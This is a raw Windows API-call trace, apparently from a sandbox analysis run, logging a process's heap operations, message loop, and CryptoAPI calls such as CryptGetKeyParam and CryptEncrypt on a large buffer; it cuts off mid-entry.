RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.310] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0076.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0076.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0076.334] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0076.335] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2580, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2580*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.337] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 1 [0076.337] TranslateMessage (lpMsg=0x144e894) returned 0 [0076.337] DispatchMessageW (lpMsg=0x144e894) returned 0x0 [0076.337] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0076.337] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0076.337] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.337] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.338] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0076.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0076.339] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.339] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.354] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x55000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x55010) returned 1 [0076.354] CharLowerBuffW (in: lpsz="byte[348177]", cchLength=0xc | out: lpsz="byte[348177]") returned 0xc [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, 